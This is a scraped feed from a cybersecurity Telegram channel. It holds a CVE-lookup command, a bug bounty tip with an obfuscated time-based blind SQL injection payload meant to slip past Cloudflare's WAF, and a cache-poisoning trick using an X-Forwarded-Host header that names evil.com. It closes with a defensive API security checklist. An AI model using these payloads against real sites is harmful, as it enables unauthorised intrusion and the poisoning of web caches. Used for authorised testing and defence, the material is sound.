HACKLIDO | Cyber Security
8.04K subscribers
157 photos
18 files
1K links
Hacklido – Cybersecurity & Hacking Community
⚑️ Daily Security Tips | OSINT | Bug Bounty | Pentesting
πŸ“œ Cheatsheets β€’ Tools β€’ Threat Intel β€’ Cyber News
✍️ Learn β€’ Blog β€’ Grow Together

🧊 https://hacklido.com
Download Telegram
How I track the latest CVEs β€” top 20, fast πŸ”₯

curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'

==> Want id+summary?

curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'


Note : Make sure you remove the space between https:/ and /cvedb before using the command must be https://

Tool: cvedb.shodan.io
Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi

When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!

❌ Blocked Payload
(select(0)from(select(sleep(10)))v) β†’ 403 Forbidden

βœ… Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)


πŸ” This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
❀3
CACHE POISONING QUICK WIN:

Most apps validate X-Forwarded-Host as a single value.
But try this:

X-Forwarded-Host: http://legit.com, http://evil.com

β€’ CDN: Reads first β†’ Allows βœ…
β€’ App: Reads last β†’ Injects
You guy's are liking new content, right?
❀5
Happy New Year Fam🀩❀️..
πŸ”₯3❀2
πŸ” *How to Secure Your APIs – A Practical Guide*

APIs are the backbone of modern apps β€” but without security, they become open doors to attacks. Here's how to lock them down effectively:

---

βœ… *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*

---

πŸ” *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection

---

πŸ“¦ *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*

---

πŸ“œ *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP

---

πŸ•΅οΈβ€β™‚οΈ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)

---

🧱 *6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting

---

Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.
❀1πŸ”₯1
❀3